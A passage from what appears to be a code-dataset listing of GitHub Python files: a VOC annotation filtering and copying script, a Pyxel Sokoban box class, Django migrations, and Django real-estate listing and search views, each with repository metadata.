                cnt_row = 2
                cnt_col = cnt_col + 1
    # save excel
    write_wb.save(excelname)
|
[
"[email protected]"
] | |
d0cfa91a612e5464cf3ec459ef9654cb5a56acc1
|
f248e0801c1ca5fad15aa72791561803183ecb26
|
/so_copy.py
|
e2ba77e36d298c39c762316199150bfccd486665
|
[] |
no_license
|
646677064/tools_feature
|
b7b305cb11ffcc6d7b43a4d3ea3c8bab16d0791a
|
f7237bd18c4b17789d06769ee34aadfd478a1a2c
|
refs/heads/master
| 2021-06-22T05:57:19.469038 | 2019-08-28T10:50:13 | 2019-08-28T10:50:13 | 130,177,884 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 13,459 |
py
|
import argparse
from collections import OrderedDict
#from google.protobuf import text_format
#import matplotlib
# Force matplotlib to not use any Xwindows backend.
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
import cv2
import numpy as np
import os
#import skimage.io as io
import sys
import xml.etree.ElementTree as ET
from xml.etree.ElementTree import ElementTree,Element
from xml.etree.ElementTree import SubElement
import cPickle
import random
import math
import sys,os,subprocess,commands
from subprocess import Popen,PIPE
def remove_Anotations(AnnotationDir,outDir):
    """Sanitise VOC-style annotation XMLs and drop unwanted classes.

    For every .xml in *AnnotationDir*: clamp bounding boxes into the
    image frame, and delete every <object> whose class name is in the
    hard-coded remove list (package1..package17).  Files that needed any
    change are rewritten into *outDir*.  Python 2 code.  NOTE(review):
    indentation reconstructed from a whitespace-stripped source.
    """
    print "==========="
    # (an earlier remove list of coffee-brand classes — Maxwellhouse, G7,
    # Oldtown, Hougu, Kapalapi, Moka, coffee, kopiko and several package
    # entries — was commented out here; dead code omitted)
    removelist_key = ["package1"]
    removelist_key.append("package2")
    removelist_key.append("package3")
    removelist_key.append("package4")
    removelist_key.append("package5")
    removelist_key.append("package6")
    removelist_key.append("package7")
    removelist_key.append("package8")
    removelist_key.append("package9")
    removelist_key.append("package10")
    removelist_key.append("package11")
    removelist_key.append("package12")
    removelist_key.append("package13")
    removelist_key.append("package14")
    removelist_key.append("package15")
    removelist_key.append("package16")
    removelist_key.append("package17")
    f_list = os.listdir(AnnotationDir)
    i=0  # counter only incremented inside commented-out code; stays 0
    for file_comp4 in f_list:
        if os.path.splitext(file_comp4)[1] == '.xml':
            file_tmp = AnnotationDir+"/"+file_comp4
            treeA=ElementTree()
            treeA.parse(file_tmp)
            width = int(treeA.find('size/width').text)
            height = int(treeA.find('size/height').text)
            depth = int(treeA.find('size/depth').text)
            if width==0 or height==0 or depth==0:
                # NOTE(review): 'break' aborts the whole directory scan on
                # the first bad file — 'continue' was probably intended.
                print file_comp4,"width==0 or height==0 or depth==0"
                break
            bfind_one_space = False;
            # (commented-out block: re-checking the XML size against the
            # actual JPEG via cv2, and an alternative child-removal loop
            # over annotation children — dead code omitted)
            rootA=treeA.getroot()
            print rootA.tag
            children = rootA.findall('object')
            for obj in children:
                xmlname = obj.find('name').text
                xmlname = xmlname.strip()
                # (commented-out "Others1" -> "others1" renaming
                # experiment omitted)
                xmin = int(obj.find('bndbox').find('xmin').text)
                ymin = int(obj.find('bndbox').find('ymin').text)
                xmax = int(obj.find('bndbox').find('xmax').text)
                ymax = int(obj.find('bndbox').find('ymax').text)
                # Clamp boxes to [1, size-1]; any clamp marks the file
                # dirty so it gets rewritten.
                if xmin<=0 :
                    bfind_one_space = True
                    obj.find('bndbox').find('xmin').text = str(1)
                if ymin<=0 :
                    bfind_one_space = True
                    obj.find('bndbox').find('ymin').text = str(1)
                if xmax>= width :
                    bfind_one_space = True
                    obj.find('bndbox').find('xmax').text = str(width-1)
                if ymax>= height :
                    bfind_one_space = True
                    obj.find('bndbox').find('ymax').text = str(height-1)
                if xmin>=xmax or ymin>= ymax:
                    # Degenerate box: only reported, not fixed.
                    print file_comp4
                if xmlname in removelist_key:
                    print xmlname
                    bfind_one_space = True
                    # Strip the object's children first, then the object
                    # itself (ElementTree.remove needs the direct parent).
                    name_s = obj.findall('name')
                    pose_s = obj.findall('pose')
                    truncated_s = obj.findall('truncated')
                    difficult_s = obj.findall('difficult')
                    bndbox_s = obj.findall('bndbox')
                    for oobj in name_s:
                        obj.remove(oobj)
                    for oobj in pose_s:
                        obj.remove(oobj)
                    for oobj in truncated_s:
                        obj.remove(oobj)
                    for oobj in difficult_s:
                        obj.remove(oobj)
                    for oobj in bndbox_s:
                        # (commented-out per-coordinate child removal
                        # omitted)
                        obj.remove(oobj)
                    rootA.remove(obj)
            if bfind_one_space==True:
                # Rewrite only files that were actually modified.
                treeA.write(outDir+file_comp4, encoding="utf-8",xml_declaration=False)
    print i
def Popen_do(pp_string, b_pip_stdout=True):
    """Run a shell command, echo it, and print stderr on failure.

    Returns 1 both on success and on failure (the failure 'return 0' is
    commented out), so callers' ``assert Popen_do(...)`` never actually
    fires — NOTE(review): likely unintended.  Python 2 code; runs with
    shell=True, so *pp_string* must be trusted.
    """
    #print pp_string
    if b_pip_stdout==True:
        p = Popen(pp_string, shell=True, stdout=PIPE, stderr=PIPE)#,close_fds=True)
    else:
        p = Popen(pp_string, shell=True, stderr=PIPE)#,close_fds=True)
    out, err = p.communicate()
    #p.wait()
    print pp_string
    if p.returncode != 0:
        print err
        #return 0
    return 1
def find_and_remove_cp_file(skufile,dir_1,outDir):
    """Extract a per-SKU subset of a VOC-style dataset.

    Reads SKU names (one per line) from *skufile*.  For every annotation
    XML in dir_1/Annotations that mentions at least one wanted SKU,
    strips all other <object> entries, writes the reduced XML to
    outDir/Annotations and shell-copies the matching JPEG to
    outDir/JPEGImages.  Python 2 code.  NOTE(review): indentation
    reconstructed from a whitespace-stripped source.
    """
    with open(skufile,"r") as sku_f:
        sku_lines_1 = sku_f.readlines();
    test_sku=[]
    for i_sku,test_sku1 in enumerate(sku_lines_1):
        #print test_sku
        test_sku1 = test_sku1.strip().strip('\n').strip('\r')
        test_sku.append(test_sku1)
    f_list = os.listdir(dir_1+"/Annotations/")
    for file_comp4 in f_list:
        #print fname
        basename=os.path.splitext(file_comp4)[0]
        orig_xml=dir_1+"/Annotations/"+basename+".xml"
        orig_pic=dir_1+"/JPEGImages/"+basename+".jpg"
        # (commented-out unconditional cp commands omitted — dead code)
        if os.path.splitext(file_comp4)[1] == '.xml':
            file_tmp = dir_1+"/Annotations/"+file_comp4
            treeA=ElementTree()
            treeA.parse(file_tmp)
            width = int(treeA.find('size/width').text)
            height = int(treeA.find('size/height').text)
            depth = int(treeA.find('size/depth').text)
            if width==0 or height==0 or depth==0:
                # NOTE(review): 'break' aborts the whole scan on the first
                # bad file — 'continue' was probably intended.
                print file_comp4,"width==0 or height==0 or depth==0"
                break
            bfind_one_space = False;
            rootA=treeA.getroot()
            #print rootA.tag
            children = rootA.findall('object')
            # First pass: does this file mention any wanted SKU at all?
            for obj in children:
                xmlname = obj.find('name').text
                if xmlname in test_sku:
                    bfind_one_space=True
                    break
            if bfind_one_space==True:
                # Second pass: drop every object that is not a wanted SKU.
                for obj in children:
                    xmlname = obj.find('name').text
                    if xmlname not in test_sku:
                        # Strip the object's children first, then the
                        # object itself.
                        name_s = obj.findall('name')
                        pose_s = obj.findall('pose')
                        truncated_s = obj.findall('truncated')
                        difficult_s = obj.findall('difficult')
                        bndbox_s = obj.findall('bndbox')
                        for oobj in name_s:
                            obj.remove(oobj)
                        for oobj in pose_s:
                            obj.remove(oobj)
                        for oobj in truncated_s:
                            obj.remove(oobj)
                        for oobj in difficult_s:
                            obj.remove(oobj)
                        for oobj in bndbox_s:
                            # (commented-out per-coordinate child removal
                            # omitted)
                            obj.remove(oobj)
                        rootA.remove(obj)
            if bfind_one_space==True:
                # Write the reduced XML and copy the matching image.
                treeA.write(outDir+"/Annotations/"+file_comp4, encoding="utf-8",xml_declaration=False)
                orig_pic=dir_1+"//JPEGImages/"+basename+".jpg"
                ppsring= "cp "+orig_pic+" "+outDir+"/JPEGImages/"
                assert Popen_do(ppsring),ppsring+" error!"
if __name__ == "__main__":
    # One-off maintenance run over hard-coded dataset locations.
    dir_1="/storage2/tiannuodata/work/projdata/baiwei0317-2472-1/baiwei0317-2472-1proj1//"
    dir_2="/storage2/tiannuodata/work/projdata/baiwewi0301-2323/baiwewi0301-2323proj1//"
    des_dir="/home/liushuai/medical/kele/keleproj1/"
    test_filepath="/storage2/tiannuodata/work/projdata/baiwei/baiweiproj1//ImageSets/Main/test.txt"
    # (commented-out mv of *.jpg into JPEG/ omitted — dead code)
    # Read the test-set file list (currently only printed/collected;
    # the copy loops that used it are commented out below).
    with open(test_filepath,"r") as f:
        test_filelist_lines = f.readlines();
    test_list=[]
    for i_file,test_file in enumerate(test_filelist_lines):
        print test_file
        temp_file = test_file.strip().strip('\n').strip('\r')
        test_list.append(temp_file)
    # (two large commented-out loops copying dir_1/dir_2 annotations and
    # images into des_dir, skipping test_list entries, omitted — dead code)
    AnnotationDir="/home/liushuai/medical/kele/keleproj1/Annotations_package/"
    outDir="/home/liushuai/medical/kele/keleproj1/Annotations/"
    #remove_Anotations(AnnotationDir,outDir)
    AnnotationDir="/home/liushuai/medical/kele/keleproj1/Annotations_package/"
    # Extract the "329" SKU subset, then the "66" subset.
    skufile="/storage2/tiannuodata/work/projdata/baiwei/329/329.txt"
    dir_1="/storage2/tiannuodata/work/projdata/baiwei/baiweiproj1//"
    outDir="/storage2/tiannuodata/work/projdata/baiwei/329/"
    find_and_remove_cp_file(skufile,dir_1,outDir)
    skufile="/storage2/tiannuodata/work/projdata/baiwei/66/66.txt"
    dir_1="/storage2/tiannuodata/work/projdata/baiwei/baiweiproj1//"
    outDir="/storage2/tiannuodata/work/projdata/baiwei/66/"
    find_and_remove_cp_file(skufile,dir_1,outDir)
|
[
"[email protected]"
] | |
d555be3771021d1b7a4deba78b2e8fb2f62044dc
|
5f80015d9245f8ecd1b29a644dd9ce447c78ea59
|
/box.py
|
debaae91e1fb9c57958c0a1e192ff6b1eac34ef0
|
[] |
no_license
|
leocody/Leokoban
|
9fec33a542c198959af2692769f24805e790956a
|
8ca582c2ac79dee95f6b91545773ad08e256510e
|
refs/heads/master
| 2022-07-12T11:07:13.942456 | 2020-05-16T05:19:03 | 2020-05-16T05:19:03 | 262,753,692 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,139 |
py
|
import pyxel
from constant import PYSIZE, HALFPYSIZE, WALL, U_to_D, D_to_U, L_to_R, R_to_L
class Box:
    """A pushable crate on the Sokoban grid, addressed in tile coordinates."""

    def __init__(self, x, y):
        self.x = x
        self.y = y

    # --- movement (one tile per call) ---------------------------------
    def move_up(self):
        self.y -= 1

    def move_down(self):
        self.y += 1

    def move_left(self):
        self.x -= 1

    def move_right(self):
        self.x += 1

    # --- rendering ----------------------------------------------------
    def draw(self):
        """Blit the crate sprite at this box's pixel position."""
        pyxel.blt(self.x * PYSIZE, self.y * PYSIZE, 0, 48, 0, 16, 16)

    # --- queries ------------------------------------------------------
    def is_collision(self, player_nxt_pos_x, player_nxt_pos_y):
        """Return True if the player's next position lands on this box."""
        return player_nxt_pos_x == self.x and player_nxt_pos_y == self.y

    def can_move(self, stage, other_boxes, direction):
        """Return True if the box can be pushed one tile in *direction*."""
        return self.no_wall(stage, direction) and self.no_boxes(other_boxes, direction)

    def no_wall(self, stage, direction):
        """Return True unless the destination tile is a wall."""
        if direction == D_to_U:
            nx, ny = self.x, self.y - 1
        if direction == U_to_D:
            nx, ny = self.x, self.y + 1
        if direction == L_to_R:
            nx, ny = self.x + 1, self.y
        if direction == R_to_L:
            nx, ny = self.x - 1, self.y
        return stage.get_kind(nx, ny) != WALL

    def no_boxes(self, other_boxes, direction):
        """Return True if no other box already occupies the destination tile."""
        target = None
        if direction == L_to_R:
            target = (self.x + 1, self.y)
        if direction == R_to_L:
            target = (self.x - 1, self.y)
        if direction == U_to_D:
            target = (self.x, self.y + 1)
        if direction == D_to_U:
            target = (self.x, self.y - 1)
        if target is None:
            # Unknown direction: mirror the original's "no box found" result.
            return True
        return all((box.x, box.y) != target for box in other_boxes)
|
[
"[email protected]"
] | |
0efe388f3e3a95551a15c6e5f3c3ac7d3ae444c5
|
b9062ed0431544160161a270fe669858c3ca9633
|
/blog/migrations/0003_auto_20191101_2319.py
|
f9b453d4abd8102f08dc12a51a8acc1e12851805
|
[] |
no_license
|
sd8917/LearnDjango
|
350f73ed7077d0b3ac9aa2f1e0fd7d05f67faf05
|
87a9c6c5932f685a01ad6125faf81ac94a1fac5d
|
refs/heads/master
| 2022-12-03T18:18:13.770896 | 2019-11-05T06:35:32 | 2019-11-05T06:35:32 | 219,081,219 | 1 | 0 | null | 2022-11-22T04:36:24 | 2019-11-02T00:14:05 |
Python
|
UTF-8
|
Python
| false | false | 443 |
py
|
# Generated by Django 2.2.6 on 2019-11-01 17:49
import ckeditor_uploader.fields
from django.db import migrations
class Migration(migrations.Migration):
    """Switch Blog.content to CKEditor's rich-text uploading field."""

    dependencies = [
        ("blog", "0002_auto_20191101_1435"),
    ]

    operations = [
        migrations.AlterField(
            model_name="blog",
            name="content",
            field=ckeditor_uploader.fields.RichTextUploadingField(),
        ),
    ]
|
[
"[email protected]"
] | |
11879abc6c2945784b1f79ae6a4f6f553439f8fb
|
997ccf1121c05e1d860f7ca49d3e5b0e382e473f
|
/listings/views.py
|
b66ac8b65a71f06c72986f16c2c1bacc1b671fe8
|
[] |
no_license
|
alamin2khl/dj_rs
|
57b9ddf0a5c875dbf8c40e8bf18a4c47da303326
|
364971c262ccf9383306ea07fc331193f512493b
|
refs/heads/master
| 2023-04-26T13:32:15.666633 | 2021-04-27T07:23:55 | 2021-04-27T07:23:55 | 208,812,047 | 0 | 0 | null | 2023-04-21T20:37:52 | 2019-09-16T13:51:55 |
CSS
|
UTF-8
|
Python
| false | false | 2,089 |
py
|
from django.shortcuts import get_object_or_404, render
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
from .choices import bedroom_choices, price_choices, state_choices
from .models import Listing
def index(request):
    """List published listings, newest first, paginated 3 per page."""
    listings = Listing.objects.order_by('-list_date').filter(is_published=True)

    paginator = Paginator(listings, 3)  # 3 listings per page
    # get_page() tolerates a missing/invalid ?page= value.
    paged_listings = paginator.get_page(request.GET.get('page'))

    context = {
        'listings': paged_listings,
    }
    return render(request, 'listings/listings.html', context)
def listing(request, listing_id):
    """Render the detail page for one listing; 404 if it does not exist."""
    # Named listing_obj so the local does not shadow this view function.
    listing_obj = get_object_or_404(Listing, pk=listing_id)
    context = {
        'listing': listing_obj,
    }
    return render(request, 'listings/listing.html', context)
def search(request):
    """Filter listings by GET parameters and render paginated results.

    Supported parameters (empty or absent values are ignored):
      keywords       substring match on the description
      city, state    case-insensitive exact match
      bedrooms, price  upper bound (``__lte``)
    """
    queryset_list = Listing.objects.order_by('-list_date')

    # Map each GET parameter to its ORM lookup. Iteration order matches the
    # original chain of per-parameter if-blocks; falsy values are skipped,
    # exactly as the original did.
    lookups = {
        'keywords': 'description__icontains',
        'city': 'city__iexact',
        'state': 'state__iexact',
        # NOTE(review): bedrooms uses __lte ("at most N bedrooms"); confirm
        # this is intended rather than __gte.
        'bedrooms': 'bedrooms__lte',
        'price': 'price__lte',
    }
    for param, lookup in lookups.items():
        value = request.GET.get(param)
        if value:
            queryset_list = queryset_list.filter(**{lookup: value})

    paginator = Paginator(queryset_list, 2)  # 2 results per page
    paged_listings = paginator.get_page(request.GET.get('page'))

    context = {
        'bedroom_choices': bedroom_choices,
        'price_choices': price_choices,
        'state_choices': state_choices,
        'listings': paged_listings,
        'values': request.GET,
    }
    return render(request, 'listings/search.html', context)
|
[
"[email protected]"
] | |
4b4303583c7508d156fe4cd85149381e4f8a32c2
|
ec6d6c6473bc63a44c5b820a19808877f0b494b2
|
/urlapp/migrations/0001_initial.py
|
57d7b80ccaa4e3d3e64d23697ce182476379acab
|
[] |
no_license
|
deepakkumar9470/django-url-shortner
|
d1642ac5c4d94cce259fec5024c5ecce6cc25f46
|
3b36e4b4b3dabda9b8971d45c40dc3ca082659b5
|
refs/heads/master
| 2023-07-29T06:13:24.867869 | 2021-09-12T12:39:55 | 2021-09-12T12:39:55 | 405,627,527 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 587 |
py
|
# Generated by Django 3.2.7 on 2021-09-12 04:26
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the UrlModel table mapping a full URL to its short code."""

    initial = True

    dependencies = []

    operations = [
        migrations.CreateModel(
            name="UrlModel",
            fields=[
                ("id", models.BigAutoField(auto_created=True, primary_key=True,
                                           serialize=False, verbose_name="ID")),
                ("full_url", models.CharField(max_length=10000, unique=True)),
                ("short_url", models.CharField(max_length=50, unique=True)),
            ],
        ),
    ]
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.